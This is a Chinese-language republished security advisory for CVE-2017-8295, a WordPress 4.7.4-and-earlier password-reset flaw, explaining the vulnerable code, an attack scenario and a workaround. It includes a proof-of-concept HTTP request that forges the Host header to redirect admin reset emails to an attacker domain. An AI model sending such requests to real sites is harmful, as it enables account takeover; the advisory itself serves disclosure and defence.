热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

WordPress曝未经授权的密码重置漏洞(CVE20178295)

漏洞提交者:DawidGolunski漏洞编号:CVE-2017-8295发布日期:2017-05-03修订版本:1.0漏洞
  • 漏洞提交者:Dawid Golunski
  • 漏洞编号:CVE-2017-8295
  • 发布日期:2017-05-03
  • 修订版本:1.0
  • 漏洞危害:中/高

漏洞

一、漏洞

WordPress内核<&#61; 4.7.4存在未经授权的密码重置(0day)

二、背景

WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。截止2017年2月&#xff0c;Alexa排名前1000万的站点中约有27.5%使用该管理系统。据报道有超过6000万站点使用WordPress进行站点管理或者作为博客系统。

三、介绍

WordPress的重置密码功能存在漏洞&#xff0c;在某些情况下不需要使用之前的身份令牌验证获取密码重置链接。

该攻击可导致攻击者在未经授权的情况下获取用户Wordpress后台管理权限。

四、描述

该漏洞源于WordPress默认使用不可信的数据。当生成一个密码重置邮件时应当是仅发送给与帐户相关联的电子邮件。

从下面的代码片段可以看出&#xff0c;在调用PHP mail()函数前创建了一个From email头

  1. ------[ wp-includes/pluggable.php ]------ 
  2.  
  3. ... 
  4.  
  5. if ( !isset( $from_email ) ) { 
  6.         // Get the site domain and get rid of www. 
  7.         $sitename &#61; strtolower( $_SERVER[&#39;SERVER_NAME&#39;] ); 
  8.         if ( substr( $sitename, 0, 4 ) &#61;&#61; &#39;www.&#39; ) { 
  9.                 $sitename &#61; substr( $sitename, 4 ); 
  10.         } 
  11.  
  12.         $from_email &#61; &#39;wordpress&#64;&#39; . $sitename; 
  13.  
  14. ... 
  15.  
  16. ----------------------------------------- 

正如我们所看到的&#xff0c;Wordpress为了生成重置邮件创建的一个From/Return-Path(发件人/收件人)头&#xff0c;使用SERVER_NAME变量以获取服务器的主机名。

然而&#xff0c;诸如Apache的主流web服务器默认使用由客户端提供的主机名来设置SERVER_NAME变量(参考Apache文档)

由于SERVER_NAME可以进行修改&#xff0c;攻击者可以任意设置该值&#xff0c;例如attackers-mxserver.com

这将导致Wordpress的$from_email变为wordpress&#64;attackers-mxserver.com&#xff0c;最终导致包含From/Return-Path(发件人/收件人)设置的密码重置邮件发送到了该恶意邮件地址。

至于攻击者可以修改哪那一封电子邮件的头信息&#xff0c;这取决于服务器环境(参考PHP文档)

基于邮件服务器的配置&#xff0c;可能导致被修改过邮件头的恶意收件人/发件人地址的电子邮件发送给WordPress用户。

这使得攻击者能够在不需要进行交互就可以截取本该是需要进行交互才能进行的操作的密码重置邮件。

攻击场景&#xff1a;

如果攻击者知道用户的电子邮件地址。为了让密码重置邮件被服务器拒收&#xff0c;或者无法到达目标地址。他们可以先对用户的电子邮件帐户进行DoS攻击(通过发送多个超过用户磁盘配额的大文件邮件或攻击该DNS服务器)

某些自动回复可能会附加有邮件发送副本

发送多封密码重置邮件给用户&#xff0c;迫使用户对这些没完没了的密码重置邮件进行回复&#xff0c;回复中就包含的密码链接会发送给攻击者。

五、POC

如果攻击者将类似下面的请求发送到默认可通过IP地址访问的Wordpress安装页面(IP-based vhost):

  1. -----[ HTTP Request ]---- 
  2.  
  3. POST /wp/wordpress/wp-login.php?action&#61;lostpassword HTTP/1.1 
  4. Host: injected-attackers-mxserver.com 
  5. Content-Type: application/x-www-form-urlencoded 
  6. Content-Length: 56 
  7.  
  8. user_login&#61;admin&redirect_to&#61;&wp-submit&#61;Get&#43;New&#43;Password 
  9.  
  10. ------------------------ 

WordPress将触发管理员账户的密码重置功能

由于修改了主机头&#xff0c;SERVER_NAME变量将被设置为攻击者所选择的主机名&#xff0c;因此Wordpress会将以下电子邮件头信息和正文传递给/usr/bin/sendmail

  1. ------[ resulting e-mail ]----- 
  2.  
  3. Subject: [CompanyX WP] Password Reset 
  4. Return-Path: <wordpress&#64;attackers-mxserver.com> 
  5. From: WordPress <wordpress&#64;attackers-mxserver.com> 
  6. Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016&#64;attackers-mxserver.com> 
  7. X-Priority: 3 
  8. MIME-Version: 1.0 
  9. Content-Type: text/plain; charset&#61;UTF-8 
  10. Content-Transfer-Encoding: 8bit 

有人请求将以下账户的密码进行重置&#xff1a;

  1. http://companyX-wp/wp/wordpress/ 
  2. Username: admin 

如果是弄错了&#xff0c;直接忽略该邮件就好。重置密码请访问以下地址&#xff1a;

  1. http://companyx-wp/wp/wordpress/wp-login.php?action&#61;rp&key&#61;AceiMFmkMR4fsmwxIZtZ&login&#61;admin%3E 

正如我们看到的&#xff0c;Return-Path, From, 以及Message-ID字段都是攻击者控制的域

通过bash脚本替换/usr/sbin/sendmail以执行头的验证&#xff1a;

  1. #!/bin/bash 
  2. cat > /tmp/outgoing-email 

六、业务影响

在利用成功的基础上&#xff0c;攻击者可重置用户密码并且未经授权获取WordPress账户访问权限。

七、系统影响

WordPress至最新版本4.7.4全部受影响

八、解决方案

目前没有官方解决方案可用。作为临时解决方案&#xff0c;用户可以启用UseCanonicalName执行SERVER_NAME静态值(参考Apache)

九、参考文献

  • https://legalhackers.com
  • https://ExploitBox.io
  • Vendor site:
  • https://wordpress.org
  • http://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname
  • http://php.net/manual/en/function.mail.php
  • https://tools.ietf.org/html/rfc5321

作者&#xff1a;鸢尾
来源&#xff1a;51CTO



推荐阅读
author-avatar
qwj6069649
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有